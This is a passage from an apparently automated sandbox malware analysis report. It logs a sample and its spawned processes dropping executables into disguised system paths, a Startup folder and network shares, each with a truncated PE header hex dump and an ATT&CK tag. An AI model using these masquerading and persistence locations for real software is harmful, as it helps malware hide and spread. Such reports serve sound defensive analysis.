4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46814 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46851 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46820 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46814 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46713 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46904 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46868 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46740 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46853 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46784 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46926 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46835 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46830 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46917 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46862 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46800 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46947 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46858 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46799 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46996 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46879 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46729 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46764 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46888 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46793 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46856 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46818 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46689 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46758 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46704 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46884 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46761 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46896 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46827 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46760 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46780 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46837 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46966 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46753 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46916 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46932 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46795 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46888 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46839 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46853 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46928 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46884 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46943 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46908 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46882 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46964 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46781 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46866 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46929 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46900 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46749 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46772 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46880 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46838 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46688 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46782 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46868 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46856 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToLocalFileTime\" with parameter 848b5e7361a4db01 & 845be73672a4db01 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"FileTimeToLocalFileTime\" with parameter 89b7738b61a4db01 & 